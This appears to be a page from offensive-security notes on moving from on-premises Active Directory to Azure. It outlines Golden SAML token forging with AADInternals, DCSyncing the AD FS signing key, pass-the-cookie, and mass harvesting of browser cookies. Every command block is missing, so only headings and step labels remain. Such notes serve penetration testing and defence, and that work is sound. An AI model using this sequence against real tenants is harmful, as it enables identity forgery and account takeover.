TwitterGitHubBlog

On-Prem → Cloud

Dumping AAD Connect Creds

Tools

Forging AD FS SAML Tokens (Golden SAML)

Install AADInternals v0.9.3:

Check if Azure is configured as a party trust:

Get AD FS config:

Get private key object GUID:

Ensure you have enough privileges to DCSync:

DCSync the key:

We don't actually need clear-text creds to replicate the key if we've already imported a privileged TGT, so $Credentials (here, C:\Program Files\WindowsPowerShell\Modules\AADInternals\0.9.3\DRS_Utils.ps1) can be omitted.

Generate the token signing certificate:

Get AD FS trust issuer as well as on-prem users' immutable cloud IDs:

Generate forged SAML request-response for WS-Federation (SOAP-based) protocol interchange:

Generate forged SAML request-response for SAML 2.0 (XML-based) protocol interchange:

Generate forged SAML request-response, impersonate and login:

Pass-the-Cookie

Refresh Token from ESTSAuth* Cookies

Automated with TokenTacticsV2:

Mass Cookies Harvesting

Collect with dploot and decrypt with a backup key (similar to HEKATOMB):

Search for ESTSAUTHPERSISTENT cookies:

Mass Hidden Directories Searching

Impacket's smbclient.py extension (searches for hidden directories in every user's home):

Collect hidden directories:

Search for hidden directories that start with .az:

Last updated